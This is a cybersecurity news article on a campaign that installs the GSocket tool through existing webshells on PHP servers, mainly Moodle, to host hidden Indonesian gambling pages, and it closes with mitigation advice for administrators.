A massive cybersecurity threat has emerged as hackers exploit vulnerabilities in PHP-based web applications to deploy malware on a global scale.
Imperva Threat Research has uncovered a coordinated campaign targeting thousands of websites, with a particular focus on Indonesian online gambling platforms.
The attacks, originating from Python-based bots, have been observed over the past two months, coinciding with intensified efforts by the Indonesian government to crack down on illegal online gambling.
While the researchers observed that the campaign has affected web servers worldwide, there is a notable concentration on Indonesian sites, aligning with recent enforcement actions in the country.
At the heart of this malicious campaign is the deployment of GSocket, a powerful networking toolkit developed by HackersChoice.
.webp)
The attackers are utilizing a one-liner command to install GSocket on compromised servers, enabling remote connections that bypass NAT and firewalls.
This tool allows attackers to establish secure TCP connections between hosts, regardless of network restrictions. The hackers’ strategy involves targeting pre-existing webshells on compromised PHP servers.
By sending a high volume of requests to common webshell paths and using known parameters, the attackers increase their chances of locating active webshells to execute commands and install the GSocket toolkit.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
Technical Analysis
Moodle, a popular Learning Management System, has been identified as a primary target in this campaign.
Investigators discovered numerous backdoored Moodle instances with traces of GSocket infection. The attackers have implemented persistence mechanisms, allowing them to maintain access even after the removal of initial backdoors.
Further investigation revealed that the compromised servers are being used to host landing pages for Indonesian online gambling services.
These pages are designed to be visible only to search engine bots, while regular visitors are redirected to other gambling domains.
.webp)
This tactic allows the attackers to exploit legitimate websites to promote illegal gambling operations, making it challenging for authorities to shut down these activities.
The scale of this exploitation is significant, with search engine results for common Indonesian gambling terms revealing a vast network of compromised sites.
This approach enables threat actors to quickly adapt when one gambling site is taken offline, ensuring minimal disruption to their illegal operations.
Website owners and administrators must remain vigilant and prioritize cybersecurity to protect their digital assets and users from exploitation.
To mitigate the risks associated with this campaign, website administrators are urged to:-
- Regularly check for backdoors and unauthorized modifications to their web applications.
- Implement robust security measures, including regular software updates and patches.
- Use Web Application Firewalls (WAF) to detect and block malicious requests.
- Monitor server logs for suspicious activities and unauthorized access attempts.
Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar